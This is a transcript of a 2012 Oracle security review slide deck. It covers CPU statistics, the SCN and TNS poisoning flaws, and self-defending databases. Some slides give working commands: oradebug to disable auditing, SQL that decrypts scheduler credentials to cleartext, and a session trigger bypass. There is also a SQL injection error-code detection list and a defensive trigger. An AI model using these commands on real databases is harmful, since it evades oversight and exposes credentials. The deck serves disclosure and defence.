Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle!...
Transcript of Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle!...
![Page 1: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/1.jpg)
Best of Oracle Security 2012Best of Oracle Security 2012What happened in 2012
![Page 2: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/2.jpg)
Agenda
! Recapitulation 2011! January 2012 - October 2012! Q&A
![Page 3: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/3.jpg)
Recapitulation 2011
![Page 4: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/4.jpg)
Oradebug
! Undocumented function in Oracle
! Details published in 2011 (Hacktivity 2011*)
! Allows to run OS commands
! Allows to disables normal and SYS Auditing
! Can‘t be audited
! Platform independent solution without poke added
* http://soonerorlater.hu/download/hacktivity_lt_2011_en.pdf
![Page 5: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/5.jpg)
Oradebug
! Undocumented function in Oracle
! Details published in 2011 (Hacktivity 2011*)
! Allows to run OS commands
! Allows to disables normal and SYS Auditing
! Can‘t be audited
! Platform independent solution without poke added
* http://soonerorlater.hu/download/hacktivity_lt_2011_en.pdf
UNFIXED
![Page 6: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/6.jpg)
Disable Oracle AuditingSQL> oradebug setmypid
Statement processed.
SQL> oradebug setvar sga kzaflg_ 0
BEFORE: [1492F4EC0, 1492F4EC4) = 00000001
AFTER: [1492F4EC0, 1492F4EC4) = 00000000
![Page 7: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/7.jpg)
2012 - The Good, The Bad, The Ugly
![Page 8: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/8.jpg)
The good
Lowest number of vulnerabilities in Oracle
database ever
! Only 17 findings in 2012 (2011: 29, 2010: 31)
! More (8) remote exploitable bugs (2011: 5 )
![Page 9: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/9.jpg)
The good
Lowest number of vulnerabilities in Oracle
database ever
! Only 17 findings in 2012 (2011: 29, 2010: 31)
! More (8) remote exploitable bugs (2011: 5 )
• January 2012 CPU (2 Vulnerabilities – 1 remote)
• April 2012 CPU (6 Vulnerabilities – 3 remote)
• July 2012 CPU (4 Vulnerabilities – 3 remote)
• October 2012 CPU (5 Vulnerabilities – 1 remote)
![Page 10: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/10.jpg)
The bad
Critical bugs are not fixed (only workarounds)
! SCN bug was not fixed
! TNS Poisoning was not fixed
! Stealth Password Cracking was not fixed
![Page 11: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/11.jpg)
The ugly
Oracle Corporation
! Really bad communication skills (TNS poisoning)
! Unwilling to fix problems (TNS poisoning, stealth
password cracking)
! Customer is guilty for not fixing issues: „Customers
have requested that Oracle not include such security
fixes into Critical Patch Updates ...“
![Page 12: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/12.jpg)
2012
![Page 13: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/13.jpg)
January 2012
* http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html ** http://www.infoworld.com/d/security/fundamental-oracle-flaw-revealed-184163-0
![Page 14: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/14.jpg)
January 2012
• Oracle CPU January 2012 *
* http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html ** http://www.infoworld.com/d/security/fundamental-oracle-flaw-revealed-184163-0
![Page 15: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/15.jpg)
January 2012
• Oracle CPU January 2012 *
• Problem with large Sequence Change Numbers
(SCN) **
* http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html ** http://www.infoworld.com/d/security/fundamental-oracle-flaw-revealed-184163-0
![Page 16: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/16.jpg)
January 2012 CPU*
• 2 security fixes (1 remote exploitable)
• Core RDBMS
• TNS Listener
![Page 17: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/17.jpg)
SCN Problem
! When Oracle databases link to each other, maintaining data consistency requires them to synchronize to a common SCN. The highest SCN is taken.
! Due to a problem in the backup the SCN increases dramatically
! Undocumented parameter _minimum_giga_scn allows to set parameters to a dedicated value
! Backup bug and undocumented parameter was fixed/removed via the January 2012 CPU.
* http://www.gokhanatil.com/2012/01/fundamental-oracle-flaw-revealed-lets.html
![Page 18: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/18.jpg)
SCN Problem
! When Oracle databases link to each other, maintaining data consistency requires them to synchronize to a common SCN. The highest SCN is taken.
! Due to a problem in the backup the SCN increases dramatically
! Undocumented parameter _minimum_giga_scn allows to set parameters to a dedicated value
! Backup bug and undocumented parameter was fixed/removed via the January 2012 CPU.
* http://www.gokhanatil.com/2012/01/fundamental-oracle-flaw-revealed-lets.html
UNFIXED
![Page 19: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/19.jpg)
SCN: 10 Mio
DB1
![Page 20: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/20.jpg)
SCN: 10 Mio
DB1
DB2
SCN: 2 Mio
![Page 21: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/21.jpg)
SCN: 10 Mio
DB1
DB2
SCN: 2 Mio
Database Link
![Page 22: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/22.jpg)
SCN: 10 Mio
DB1
DB2
SCN: 2 Mio
Database Link
Compare 10 Mio vs. 2 Mio
Take the highest number
![Page 23: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/23.jpg)
SCN: 10 Mio
DB1
DB2
SCN: 2 Mio
Database Link
Compare 10 Mio vs. 2 Mio
Take the highest number
Undocumented Oracle Parameter
or
Backup bug is dramatically increasing the SCN
![Page 24: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/24.jpg)
Use undocumented parameter and set the the time of the attacker databaseto set point in future and use a huge SCN
![Page 25: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/25.jpg)
Use undocumented parameter and set the the time of the attacker databaseto set point in future and use a huge SCN
Attacker
![Page 26: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/26.jpg)
Use undocumented parameter and set the the time of the attacker databaseto set point in future and use a huge SCN
Attacker
Database Link
SCN: Huge SCN
![Page 27: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/27.jpg)
Use undocumented parameter and set the the time of the attacker databaseto set point in future and use a huge SCN
Attacker
DB2
SCN: Huge SCN
DB Crash after a while
Database Link
SCN: Huge SCN
![Page 28: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/28.jpg)
February 2012
• Get DBMS_SCHEDULER.CREATE_CREDENTIAL
cleartext password *
• DBMS_SCHEDULER opens a port 4444 if
undocumented parameters are used **
* http://berxblog.blogspot.com.au/2012/02/restore-dbmsschedulercreatecredential.html?utm_source=dlvr.it&utm_medium=twitter&utm_campaign=Feed:+orana+(OraNA** http://berxblog.blogspot.com.au/2012/02/some-tracing-events-in-dbmsscheduler.html
![Page 29: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/29.jpg)
February 2012
• Get DBMS_SCHEDULER.CREATE_CREDENTIAL
cleartext password *
• DBMS_SCHEDULER opens a port 4444 if
undocumented parameters are used **
* http://berxblog.blogspot.com.au/2012/02/restore-dbmsschedulercreatecredential.html?utm_source=dlvr.it&utm_medium=twitter&utm_campaign=Feed:+orana+(OraNA** http://berxblog.blogspot.com.au/2012/02/some-tracing-events-in-dbmsscheduler.html
Featu
re
![Page 30: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/30.jpg)
exec DBMS_SCHEDULER.CREATE_CREDENTIAL( credential_name => 'local_credential', username => 'oracle', password => 'welcome1');
select o.object_name credential_name, username, password FROM SYS.SCHEDULER$_CREDENTIAL c, DBA_OBJECTS o WHERE c.obj# = o.object_id;
CREDENTIAL_NAME USERNAME PASSWORD------------------ -------- ------------------------------------LOCAL_CREDENTIAL oracle BWVYxxK0fiEGAmtiKXULyfXXgjULdvHNLg==LOCAL_CREDENTIAL2 oracle2 BWyCCRtd8F0zAVYl44IhvVcJ2i8wNUniDQ==
SELECT u.name CREDENTIAL_OWNER, O.NAME CREDENTIAL_NAME, C.USERNAME, DBMS_ISCHED.GET_CREDENTIAL_PASSWORD(O.NAME, u.name) pwdFROM SYS.SCHEDULER$_CREDENTIAL C, SYS.OBJ$ O, SYS.USER$ UWHERE U.USER# = O.OWNER# AND C.OBJ# = O.OBJ# ;
CREDENTIAL_OWNER CREDENTIAL_NAME USERNAME PWD---------------- -------------------- -------- --------SYS LOCAL_CREDENTIAL oracle welcome1SYS LOCAL_CREDENTIAL2 oracle2 welcome1
Decrypt Oracle Scheduler Credentials
![Page 31: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/31.jpg)
...bit 0x20000 - start DBMS_DEBUG_JDWP.CONNECT_TCP in file watcherbitand( ,131072)starts DBMS_DEBUG_JDWP.CONNECT_TCP on localhost, port 4444 I'm not sure if I like this event. In general I don't want any software opening connections without my knowing. And I could not find this documented anywhere. Is it fair to call this a backdoor?...
Due to undocumented functionality DBMS_SCHEDULER
listens a port 4444 if a special parameter is used.
Scheduler Credentials
![Page 32: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/32.jpg)
March 2012
• Disabling Oracle trigger on a per-session basis *
• Self-Defending Databases **
* http://www.pythian.com/news/30781/disabling-triggers-per-session/ ** http://www.red-database-security.com/wp/selfdefending_databases_hashdays_2012.pdf
![Page 33: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/33.jpg)
SQL> exec dbms_xstream_gg.set_foo_trigger_session_contxt(fire=>true); PL/SQL procedure successfully completed.
Disable Oracle Triggers for a session
Disable all triggers for a session. This could be used to
bypass shadow/history table architectures.
![Page 34: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/34.jpg)
SQL> exec dbms_xstream_gg.set_foo_trigger_session_contxt(fire=>true); PL/SQL procedure successfully completed.
Disable Oracle Triggers for a session
Disable all triggers for a session. This could be used to
bypass shadow/history table architectures.
Featu
re
![Page 35: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/35.jpg)
Self-defending Databases
• Nearly every SQL Injection abused from the web is creating
errors in the database
![Page 36: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/36.jpg)
Self-defending Databases
• Nearly every SQL Injection abused from the web is creating
errors in the database
• A typical attacks takes less than 2 minutes to download data
![Page 37: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/37.jpg)
Self-defending Databases
• Nearly every SQL Injection abused from the web is creating
errors in the database
• A typical attacks takes less than 2 minutes to download data
• 2 minutes are to short for humans to react
![Page 38: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/38.jpg)
Self-defending Databases
• Nearly every SQL Injection abused from the web is creating
errors in the database
• A typical attacks takes less than 2 minutes to download data
• 2 minutes are to short for humans to react
• But the database itself is able to detect these kind of attacks
by looking at specific error messages created by the SQL
injection attack
![Page 39: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/39.jpg)
Self-defending Databases
• Nearly every SQL Injection abused from the web is creating
errors in the database
• A typical attacks takes less than 2 minutes to download data
• 2 minutes are to short for humans to react
• But the database itself is able to detect these kind of attacks
by looking at specific error messages created by the SQL
injection attack
• After detection the appropriate countermeasures could be
taken.
![Page 40: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/40.jpg)
22
![Page 41: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/41.jpg)
22
![Page 42: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/42.jpg)
23
![Page 43: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/43.jpg)
23
![Page 44: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/44.jpg)
23
![Page 45: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/45.jpg)
Detection of SQL Injection Attacks (from the web)
• Depending from the used attack method (UNION, extend query, create
error messages to retrieve data, …) a specific error will be created
e.g.
ORA-01789: query block has incorrect number of result columns
• Or
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft]
[ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value ’mypassword' to a column of data type int. /
Administrator/login.asp, line 27
![Page 46: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/46.jpg)
Detection of SQL Injection Attacks (from the web)
Out-of-the-box Databases like Oracle or Microsoft SQL Server are able to
detect SQL specific error messages and can run (custom) code
(=countermeasure) after the detection.
These specific database errors only occur if a vulnerability exists and this
vulnerability was triggered by a specific string (e.g. “or 1=1--”)
False positives are rare. A false positive could occur if a developers are
deploying applications with incorrect SQL statement (e.g. missing single
quote).
![Page 47: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/47.jpg)
SQL Injection Error Codes Oracle - IError code Error Message Typical Command
ORA-00900
ORA-00906
ORA-00907
ORA-00911
ORA-00917
ORA-00920
ORA-00923
ORA-00933
ORA-00970
ORA-01031
ORA-01476
ORA-01719
ORA-01722
invalid SQL statement
missing left parenthesis
missing right parenthesis
invalid character e.g. PHP MAGIC_QUOTES_GPC activated and attempt to inject a single quote
missing comma
invalid relational operator
FROM keyword not found where expected
SQL command not properly terminated
missing WITH keyword
insufficient privileges Attempted privilege escalation
divisor is equal to zero Blind SQL Injection attempt (e.g. sqlmap)
outer join operator not allowed in operand of OR or IN
invalid number Enumeration with rownum and current rownum does not exist
![Page 48: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/48.jpg)
SQL Injection Error Codes Oracle - IIError code Error Message Typical CommandORA-01742
ORA-01756
ORA-01789
ORA-01790
ORA-24247
ORA-29257
ORA-29540
ORA-31011ORA-19202
comment not properly terminated inline comment, e.g optimizer hint is not properly terminatedquoted not properly terminated single quote not properly terminated
query block has incorrect number of result columns
Attempt to use UNION SELECT
expression must have same datatype as corresponding
Attempt to use UNION SELECT
network access denied by access control list
Oracle ACL has blocked the usage of UTL_INADDR (or similar)
Host %S unknown Attempted SQL Injection via utl_inaddr
Class does not exist Attempted utl_inaddr attempt but Java is not installed
XML parsing failed SQL Injection attempt via xmltypeError occurred in XML processing SQL Injection via extractvalue
![Page 49: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/49.jpg)
CREATE OR REPLACE TRIGGER after_error AFTER SERVERERROR ON DATABASE DECLARE sql_text ORA_NAME_LIST_T; v_stmt CLOB; -- SQL statement causing the problem n NUMBER; -- number of junks for constructing the sql statement causing the error v_program VARCHAR2(64); v_serial number; v_sid number;BEGIN-- Version 1.00select program,serial#,sid into v_program,v_serial,v_sid from v$session where sid=sys_context('USERENV', 'SID'); -- construct the sql text n := ora_sql_txt(sql_text); -- IF n >= 1 THEN FOR i IN 1..n LOOP v_stmt := v_stmt || sql_text(i); END LOOP; END IF; --
![Page 50: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/50.jpg)
FOR n IN 1..ora_server_error_depth LOOP
IF (lower(v_program) = 'iis.exe') -- add your own application server and (ora_server_error(n) in ('942','900','906','907','911','917','920','923','933','970','1031','1476','1719','1722','1742','1756','1789','1790','19202','24247','29257','29540','31011')) THEN -- Potential attack was detected -- 1. Monitor the attack -- 2. Send an email to the responsible person (DBA/MoD) -- send_email (e.g. via utl_smtp ) -- 3. Lock database user used by the webapp execute immediate ('ALTER USER /* Error_Trigger */ "'|sys_context('USERENV','SESSION_USER')||'" account lock'); -- 4. Terminate Session execute immediate ('ALTER SYSTEM /* Error_Trigger */ KILL SESSION '''||v_sid||','||v_serial||''' account lock'); alter system kill session 'session-id,session-serial' -- 5. Other countermeasures
END IF; END LOOP; --END after_error;/
![Page 51: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/51.jpg)
April 2012
• Oracle CPU April 2012 *
• TNS Poisoning **
• Critical MySQL Bug published ***
* http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html ** http://seclists.org/fulldisclosure/2012/Apr/343*** https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
![Page 52: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/52.jpg)
April 2012 CPU*
• 6 security fixes (3 remote exploitable)
• Core RDBMS
• OCI
• Enterprise Manager
* http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
![Page 53: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/53.jpg)
TNS Poisoning
• Reported by Joxean Koret in 2008 to Oracle*
• Everyone with access to the listener can redirect any
network traffic by registering a second listener.
• Affects all versions of Oracle (8i-11g R2)
• Due to a communication problem („was fixed in a
future version“) the founder of this bug released an
advisory including proof-of-concept code (for SIDs
mit 6 characters).
• To implement a workaround Oracle even changed
the license agreement for RAC (inclusion of
Advanced Security Option ASO) to be able to
protect RAC.
* http://seclists.org/fulldisclosure/2012/Apr/204
![Page 54: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/54.jpg)
TNS Poisoning
• Reported by Joxean Koret in 2008 to Oracle*
• Everyone with access to the listener can redirect any
network traffic by registering a second listener.
• Affects all versions of Oracle (8i-11g R2)
• Due to a communication problem („was fixed in a
future version“) the founder of this bug released an
advisory including proof-of-concept code (for SIDs
mit 6 characters).
• To implement a workaround Oracle even changed
the license agreement for RAC (inclusion of
Advanced Security Option ASO) to be able to
protect RAC.
UNFIXED
* http://seclists.org/fulldisclosure/2012/Apr/204
![Page 55: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/55.jpg)
Listener
![Page 56: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/56.jpg)
Attacker Listener
![Page 57: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/57.jpg)
Attacker Listener
Register Additional Listener
![Page 58: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/58.jpg)
Attacker Listener
